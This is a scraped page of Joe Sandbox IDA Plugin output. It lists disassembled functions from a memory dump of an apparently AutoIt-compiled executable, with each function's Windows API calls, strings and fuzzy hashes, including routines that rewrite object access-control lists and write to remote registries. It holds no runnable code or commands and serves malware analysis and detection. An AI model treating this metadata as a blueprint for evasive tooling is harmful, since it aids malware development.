Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 3308f2f02d27b7a89766bdc5bca95e57f4c1d2e0005646d7b35ecaf4084c5529
Instruction ID: 0c0aa88ebe893425b0f352fef5591e9110af49aa4e278df52fdd9cfd8194f6f8
Opcode Fuzzy Hash: 3308f2f02d27b7a89766bdc5bca95e57f4c1d2e0005646d7b35ecaf4084c5529
Instruction Fuzzy Hash: 9D129B30621252EFD729CF24E888BA9B7E5BB45300F154469F4859B662CB72ECB1CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00292711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 0029273E
SystemParametersInfoW.USER32 ref: 0029286A
SetRect.USER32 ref: 002928A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 002928B9
CreateWindowExW.USER32 ref: 00292900
GetClientRect.USER32 ref: 0029290C
CreateWindowExW.USER32 ref: 00292955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00292964
GetStockObject.GDI32(00000011), ref: 00292974
SelectObject.GDI32(00000000,00000000), ref: 00292978
GetTextFaceW.GDI32(00000000,00000040,?), ref: 00292988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00292991
DeleteDC.GDI32(00000000), ref: 0029299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002929C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 002929DD
CreateWindowExW.USER32 ref: 00292A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00292A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00292A42
CreateWindowExW.USER32 ref: 00292A77
GetStockObject.GDI32(00000011), ref: 00292A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00292A8D
ShowWindow.USER32(00000004), ref: 00292A97

Strings

static, xrefs: 0029294F, 00292A71
AutoIt v3, xrefs: 002928F8
DISPLAY, xrefs: 0029295A
msctls_progress32, xrefs: 00292A13

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 1746e4c7bee64475d1df6441874c0e9b45118efccdf425d36da2c554fd58bdb9
Instruction ID: bac5c257a81756ba46d57fd5f47093f962abc43c1a62fb19206c4189af68ad81
Opcode Fuzzy Hash: 1746e4c7bee64475d1df6441874c0e9b45118efccdf425d36da2c554fd58bdb9
Instruction Fuzzy Hash: 68B16A71A50205BFEB14DFA8DC89FAEBBB9EB49710F104154F914EB290DB70AD50CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00284ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00284AED
GetDriveTypeW.KERNEL32(?,002ACB68,?,\\.\,002ACC08), ref: 00284BCA
SetErrorMode.KERNEL32(00000000,002ACB68,?,\\.\,002ACC08), ref: 00284D36

Strings

SSA, xrefs: 00284CA6
\\.\, xrefs: 00284B3F
iSCSI, xrefs: 00284CC2
MMC, xrefs: 00284CDE
SSD, xrefs: 00284C4A
CDROM, xrefs: 00284BFB
ATA, xrefs: 00284C98
PhysicalDrive, xrefs: 00284B76
1394, xrefs: 00284C9F
USB, xrefs: 00284CB4
Network, xrefs: 00284C02
RAID, xrefs: 00284CBB
Virtual, xrefs: 00284CE5
Fixed, xrefs: 00284C09
Removable, xrefs: 00284C10, 00284C15
Fibre, xrefs: 00284CAD
SCSI, xrefs: 00284C8A
Unknown, xrefs: 00284BED, 00284C83
SATA, xrefs: 00284CD0
RAMDisk, xrefs: 00284BF4
ATAPI, xrefs: 00284C91
SAS, xrefs: 00284CC9
FileBackedVirtual, xrefs: 00284CEC

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: d72ea061841c17183ea8a1397b178a0eb083c36dd8fc147e8b9b356a6d1dae56
Instruction ID: 49e435113685efd30c1c0a7dc7ca860ffb7ed2a165ac8215e79f9134c2f56d35
Opcode Fuzzy Hash: d72ea061841c17183ea8a1397b178a0eb083c36dd8fc147e8b9b356a6d1dae56
Instruction Fuzzy Hash: FF61A1386361079BCB04FF24DA859ACB7B5AB15304B248117F806ABBD1DBB1EDB1DB41

Uniqueness

Uniqueness Score: -1.00%

Function 002A73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32 ref: 002A7421
SetTextColor.GDI32(?,?), ref: 002A7425
GetSysColorBrush.USER32 ref: 002A743B
GetSysColor.USER32 ref: 002A7446
CreateSolidBrush.GDI32(?), ref: 002A744B
GetSysColor.USER32 ref: 002A7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 002A7471
SelectObject.GDI32(?,00000000), ref: 002A7482
SetBkColor.GDI32(?,00000000), ref: 002A748B
SelectObject.GDI32(?,?), ref: 002A7498
InflateRect.USER32 ref: 002A74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002A74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 002A74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002A752A
GetWindowTextW.USER32 ref: 002A7554
InflateRect.USER32 ref: 002A7572
DrawFocusRect.USER32 ref: 002A757D
GetSysColor.USER32 ref: 002A758E
SetTextColor.GDI32(?,00000000), ref: 002A7596
DrawTextW.USER32(?,002A70F5,000000FF,?,00000000), ref: 002A75A8
SelectObject.GDI32(?,?), ref: 002A75BF
DeleteObject.GDI32(?), ref: 002A75CA
SelectObject.GDI32(?,?), ref: 002A75D0
DeleteObject.GDI32(?), ref: 002A75D5
SetTextColor.GDI32(?,?), ref: 002A75DB
SetBkColor.GDI32(?,?), ref: 002A75E5

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: ee23e402d7e7966a842722ce6251285bc3ab4271219e7e3ff34df784f56049e5
Instruction ID: 4547e5e30b8ccc175d67d895a2ef86e65e84d1ede62dcf469c232b3a286886ae
Opcode Fuzzy Hash: ee23e402d7e7966a842722ce6251285bc3ab4271219e7e3ff34df784f56049e5
Instruction Fuzzy Hash: 83614272D04219AFDF019FA4EC49A9EBFB9EB0A320F214125F915B72A1DB749950CF90

Uniqueness

Uniqueness Score: -1.00%

Function 002A0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 002A1128
GetDesktopWindow.USER32 ref: 002A113D
GetWindowRect.USER32(00000000), ref: 002A1144
GetWindowLongW.USER32(?,000000F0), ref: 002A1199
DestroyWindow.USER32 ref: 002A11B9
CreateWindowExW.USER32 ref: 002A11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002A120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002A121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 002A1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 002A1245
IsWindowVisible.USER32(00000000), ref: 002A12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 002A12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 002A12D0
GetWindowRect.USER32(00000000,?), ref: 002A12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 002A130E
GetMonitorInfoW.USER32(00000000,?), ref: 002A1328
CopyRect.USER32(?,?), ref: 002A133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 002A13AA

Strings

(, xrefs: 002A131B
0, xrefs: 002A10D3
tooltips_class32, xrefs: 002A11E6

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: d71d3bcf6a6d98c22667619322165dbccd4272a0ab38a4bd3ba76b57063c6a5c
Instruction ID: a5b3749c3048d22f293a331b5fde06eafa0273e7127b9c7ca269d3c62526d051
Opcode Fuzzy Hash: d71d3bcf6a6d98c22667619322165dbccd4272a0ab38a4bd3ba76b57063c6a5c
Instruction Fuzzy Hash: FCB1AF71618341AFDB04DF64C888BAABBE5FF85750F00891CF9999B261CB71E864CF91

Uniqueness

Uniqueness Score: -1.00%

Function 002A0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002A02E5
_wcslen.LIBCMT ref: 002A031F
_wcslen.LIBCMT ref: 002A0389
_wcslen.LIBCMT ref: 002A03F1
_wcslen.LIBCMT ref: 002A0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002A04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 002A0504

Part of subcall function 0022F9F2: _wcslen.LIBCMT ref: 0022F9FD

Part of subcall function 0027223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00272258
Part of subcall function 0027223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0027228A

Strings

GETSELECTED, xrefs: 002A05E1
GETSUBITEMCOUNT, xrefs: 002A0384, 002A039F
DESELECT, xrefs: 002A059C
SELECTINVERT, xrefs: 002A057E
GETITEMCOUNT, xrefs: 002A0316, 002A0337
SELECT, xrefs: 002A0548
SELECTALL, xrefs: 002A0515
FINDITEM, xrefs: 002A0627
GETSELECTEDCOUNT, xrefs: 002A0470, 002A048B
VIEWCHANGE, xrefs: 002A0675
GETTEXT, xrefs: 002A03EC, 002A0407
SELECTCLEAR, xrefs: 002A052D
ISSELECTED, xrefs: 002A04DD

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-719923060
Opcode ID: 322a3fd4288b5f0fd240a11cbb61583ffe22f62c55a29d6b2a26bc1f1daa3667
Instruction ID: ca5b32b6a99fb70def952423899f6139bb406fe14872a2d4578785c86eb9533a
Opcode Fuzzy Hash: 322a3fd4288b5f0fd240a11cbb61583ffe22f62c55a29d6b2a26bc1f1daa3667
Instruction Fuzzy Hash: BDE1DF312383019FCB14DF24C59092AB3E6BF9A714F50496DF8969B3A1DB30EDA5CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00228891 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32 ref: 00228968
GetSystemMetrics.USER32 ref: 00228970
SystemParametersInfoW.USER32 ref: 0022899B
GetSystemMetrics.USER32 ref: 002289A3
GetSystemMetrics.USER32 ref: 002289C8
SetRect.USER32 ref: 002289E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 002289F5
CreateWindowExW.USER32 ref: 00228A28
SetWindowLongW.USER32 ref: 00228A3C
GetClientRect.USER32 ref: 00228A5A
GetStockObject.GDI32(00000011), ref: 00228A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00228A81

Part of subcall function 0022912D: GetCursorPos.USER32(?), ref: 00229141
Part of subcall function 0022912D: ScreenToClient.USER32(00000000,?), ref: 0022915E
Part of subcall function 0022912D: GetAsyncKeyState.USER32 ref: 00229183
Part of subcall function 0022912D: GetAsyncKeyState.USER32 ref: 0022919D

SetTimer.USER32(00000000,00000000,00000028,002290FC), ref: 00228AA8

Strings

AutoIt v3 GUI, xrefs: 00228A20

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 295f2b7022dde2e198b7b43a1fb05ef80f043e60ed5316a8493b20d9ba13fb35
Instruction ID: 7a7fcc0a8ed1031864a860ca4395e50d2558664b5b604c60393202687e13f7b3
Opcode Fuzzy Hash: 295f2b7022dde2e198b7b43a1fb05ef80f043e60ed5316a8493b20d9ba13fb35
Instruction Fuzzy Hash: 00B19431A1021AAFDF14DFA8ED49BAE7BB5FB49314F104129FA15A7290DB70E860CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00270D8B Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 002710F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00271114
Part of subcall function 002710F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271120
Part of subcall function 002710F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 0027112F
Part of subcall function 002710F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00270B9B,?,?,?), ref: 00271136
Part of subcall function 002710F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0027114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00270DF5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00270E29
GetLengthSid.ADVAPI32(?), ref: 00270E40
GetAce.ADVAPI32(?,00000000,?), ref: 00270E7A
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00270E96
GetLengthSid.ADVAPI32(?), ref: 00270EAD
GetProcessHeap.KERNEL32(00000008,00000008), ref: 00270EB5
HeapAlloc.KERNEL32(00000000), ref: 00270EBC
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00270EDD
CopySid.ADVAPI32(00000000), ref: 00270EE4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00270F13
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00270F35
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00270F47
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270F6E
HeapFree.KERNEL32(00000000), ref: 00270F75
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270F7E
HeapFree.KERNEL32(00000000), ref: 00270F85
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00270F8E
HeapFree.KERNEL32(00000000), ref: 00270F95
GetProcessHeap.KERNEL32(00000000,?), ref: 00270FA1
HeapFree.KERNEL32(00000000), ref: 00270FA8

Part of subcall function 00271193: GetProcessHeap.KERNEL32(00000008,00270BB1,?,00000000,?,00270BB1,?), ref: 002711A1
Part of subcall function 00271193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00270BB1,?), ref: 002711A8
Part of subcall function 00271193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00270BB1,?), ref: 002711B7

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: e61ee62df7f33dd50d98223172a4eb210eb6d96617847ba3ffc2b680a38765bd
Instruction ID: 1d795297315acf2962ef11c496b97356100dee1137cd7a5ff72595dca4a504c8
Opcode Fuzzy Hash: e61ee62df7f33dd50d98223172a4eb210eb6d96617847ba3ffc2b680a38765bd
Instruction Fuzzy Hash: 9C716E7191021AEBDF20DFA4EC88FAEBBB8BF05300F148125F919E6191DB719919CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0029C3B7 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 495registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0029C4BD
RegCreateKeyExW.ADVAPI32(?,?,00000000,002ACC08,00000000,?,00000000,?,?), ref: 0029C544
RegCloseKey.ADVAPI32(00000000), ref: 0029C5A4
_wcslen.LIBCMT ref: 0029C5F4
_wcslen.LIBCMT ref: 0029C66F
RegSetValueExW.ADVAPI32 ref: 0029C6B2
RegSetValueExW.ADVAPI32 ref: 0029C7C1
RegSetValueExW.ADVAPI32 ref: 0029C84D
RegCloseKey.ADVAPI32(?), ref: 0029C881
RegCloseKey.ADVAPI32(00000000), ref: 0029C88E
RegSetValueExW.ADVAPI32 ref: 0029C960

Strings

REG_BINARY, xrefs: 0029C913
REG_SZ, xrefs: 0029C644
REG_QWORD, xrefs: 0029C8C3
REG_DWORD, xrefs: 0029C804
REG_EXPAND_SZ, xrefs: 0029C5CD
REG_MULTI_SZ, xrefs: 0029C6F5

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: Value$Close$_wcslen$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 9721498-966354055
Opcode ID: 34dbd3ccedb8246d8fd1da757e18e40f4fd7512f50b96eed17a5de545eb770f2
Instruction ID: bc53d1bece745d437f9c3d87394c5ef348b64b13f724bc2a3bf3c68f2c06f937
Opcode Fuzzy Hash: 34dbd3ccedb8246d8fd1da757e18e40f4fd7512f50b96eed17a5de545eb770f2
Instruction Fuzzy Hash: 5D126975624201AFDB14DF14C891A6AB7E5FF88714F24889DF84A9B3A2DB31EC51CF81

Uniqueness

Uniqueness Score: -1.00%

Function 002A091E Relevance: 30.1, APIs: 6, Strings: 11, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 002A09C6
_wcslen.LIBCMT ref: 002A0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002A0A54
_wcslen.LIBCMT ref: 002A0A8A
_wcslen.LIBCMT ref: 002A0B06
_wcslen.LIBCMT ref: 002A0B81

Part of subcall function 0022F9F2: _wcslen.LIBCMT ref: 0022F9FD

Part of subcall function 00272BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00272BFA

Strings

UNCHECK, xrefs: 002A0D3E
GETSELECTED, xrefs: 002A0C4E
COLLAPSE, xrefs: 002A0B01, 002A0B1C
GETTOTALCOUNT, xrefs: 002A09F2, 002A0A17
ISCHECKED, xrefs: 002A0CE1
EXISTS, xrefs: 002A0B7C, 002A0B97
GETITEMCOUNT, xrefs: 002A0C1E
CHECK, xrefs: 002A0A85, 002A0AA0
GETTEXT, xrefs: 002A0C97
SELECT, xrefs: 002A0D11
EXPAND, xrefs: 002A0BF8

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 046a0039f77dad810612c624190e9aeed3daae4b4d85a2e6f8c9e4a5a7a65ca1
Instruction ID: bad0adc9d1ca42052266afc48aeb5a5765d4cd994a8cec6cf376a9944d7bae5a
Opcode Fuzzy Hash: 046a0039f77dad810612c624190e9aeed3daae4b4d85a2e6f8c9e4a5a7a65ca1
Instruction Fuzzy Hash: E9E1BE312287029FC714DF24C49096AB7E2FF99318F50895DF8969B362DB30ED65CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0029C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0029C9B5
_wcslen.LIBCMT ref: 0029C9F1
_wcslen.LIBCMT ref: 0029CA68
_wcslen.LIBCMT ref: 0029CA9E
_wcslen.LIBCMT ref: 0029CAF9
_wcslen.LIBCMT ref: 0029CB2F
_wcslen.LIBCMT ref: 0029CB7F

Strings

HKEY_CLASSES_ROOT, xrefs: 0029CAF3, 0029CAF8
HKCC, xrefs: 0029CBAC
HKU, xrefs: 0029CBF0
HKEY_CURRENT_CONFIG, xrefs: 0029CB79, 0029CB7E
HKEY_USERS, xrefs: 0029CBDF
HKCR, xrefs: 0029CB29, 0029CB2E
HKCU, xrefs: 0029CBCE
HKLM, xrefs: 0029CA98, 0029CA9D
HKEY_CURRENT_USER, xrefs: 0029CBBD
HKEY_LOCAL_MACHINE, xrefs: 0029CA62, 0029CA67

Memory Dump Source

Source File: 00000003.00000002.760350552.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.760348235.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760365653.00000000002DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.760368283.00000000002F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_YED.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: ca2f198b571b90a29993baf9eee17895be6787ed350c4cdc14d8b42efcbda7fa
Instruction ID: d79311edaeef25bf258846a4e62d8c34360a987ea3fe6922b8630ac58cbf9a8e
Opcode Fuzzy Hash: ca2f198b571b90a29993baf9eee17895be6787ed350c4cdc14d8b42efcbda7fa
Instruction Fuzzy Hash: A871F13263016B8BCF20DE78CD516BE33A5AB61764B310529F8569B284EA34CDB087A0

Uniqueness

